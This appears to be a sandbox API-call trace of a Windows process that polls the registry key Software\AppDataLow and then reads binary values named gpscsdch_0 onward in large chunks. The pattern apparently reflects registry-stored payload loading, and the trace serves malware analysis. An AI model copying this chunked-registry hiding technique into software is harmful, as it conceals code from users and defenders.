	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] GetLastError () returned 0x0
	[0073.356] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0073.356] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x640, lpdwDisposition=0x0) returned 0x0
	[0073.356] RegQueryValueExW (in: hKey=0x640, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0073.356] RegCloseKey (hKey=0x640) returned 0x0
	[0073.357] RegCloseKey (hKey=0x6ec) returned 0x0
	[0073.357] Sleep (dwMilliseconds=0x1f4) 
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.876] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x6ec, lpdwDisposition=0x0) returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.877] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] GetLastError () returned 0x0
	[0073.878] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0073.878] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x640, lpdwDisposition=0x0) returned 0x0
	[0073.878] RegQueryValueExW (in: hKey=0x640, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0073.878] RegCloseKey (hKey=0x640) returned 0x0
	[0073.878] RegCloseKey (hKey=0x6ec) returned 0x0
	[0073.878] Sleep (dwMilliseconds=0x1f4) 
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.379] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x67c, lpdwDisposition=0x0) returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.380] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] GetLastError () returned 0x0
	[0074.381] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0074.381] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x680, lpdwDisposition=0x0) returned 0x0
	[0074.381] RegQueryValueExW (in: hKey=0x680, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0074.381] RegCloseKey (hKey=0x680) returned 0x0
	[0074.381] RegCloseKey (hKey=0x67c) returned 0x0
	[0074.381] Sleep (dwMilliseconds=0x1f4) 
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.920] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.921] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] GetLastError () returned 0x0
	[0074.922] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x680, lpdwDisposition=0x0) returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] GetLastError () returned 0x0
	[0074.923] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0074.923] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x678, lpdwDisposition=0x0) returned 0x0
	[0074.923] RegQueryValueExW (in: hKey=0x678, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0074.923] RegCloseKey (hKey=0x678) returned 0x0
	[0074.923] RegCloseKey (hKey=0x680) returned 0x0
	[0074.924] Sleep (dwMilliseconds=0x1f4) 
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.496] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] GetLastError () returned 0x0
	[0075.497] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fcb4, lpdwDisposition=0x0 | out: phkResult=0x203fcb4*=0x238, lpdwDisposition=0x0) returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.776] GetLastError () returned 0x0
	[0075.777] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0075.777] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0075.777] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0075.814] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x203fc7c, lpData=0x364c898, lpcbData=0x203fc88*=0x7d000 | out: lpType=0x203fc7c*=0x3, lpData=0x364c898*, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0075.830] RegCloseKey (hKey=0x23c) returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] GetLastError () returned 0x0
	[0075.833] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_1") returned 10
	[0075.833] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0075.834] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0075.886] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x203fc7c, lpData=0x364c898, lpcbData=0x203fc88*=0x7d000 | out: lpType=0x203fc7c*=0x3, lpData=0x364c898*, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0075.918] RegCloseKey (hKey=0x23c) returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.986] GetLastError () returned 0x0
	[0075.987] GetLastError () returned 0x0
	[0075.987] GetLastError () returned 0x0
	[0075.987] GetLastError () returned 0x0
	[0075.987] GetLastError () returned 0x0
	[0075.987] GetLastError () returned 0x0
	[0075.987] GetLastError () returned 0x0
	[0075.987] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_2") returned 10
	[0075.987] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0075.987] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0075.995] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x203fc7c, lpData=0x40a0048, lpcbData=0x203fc88*=0x7d000 | out: lpType=0x203fc7c*=0x3, lpData=0x40a0048*, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.013] RegCloseKey (hKey=0x23c) returned 0x0
	[0076.080] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_3") returned 10
	[0076.080] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0076.080] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.090] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x203fc7c, lpData=0x40a0048, lpcbData=0x203fc88*=0x7d000 | out: lpType=0x203fc7c*=0x3, lpData=0x40a0048*, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.153] RegCloseKey (hKey=0x23c) returned 0x0
	[0076.182] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_4") returned 10
	[0076.182] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0076.182] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.255] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x203fc7c, lpData=0x40a0048, lpcbData=0x203fc88*=0x7d000 | out: lpType=0x203fc7c*=0x3, lpData=0x40a0048*, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.268] RegCloseKey (hKey=0x23c) returned 0x0
	[0076.347] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_5") returned 10
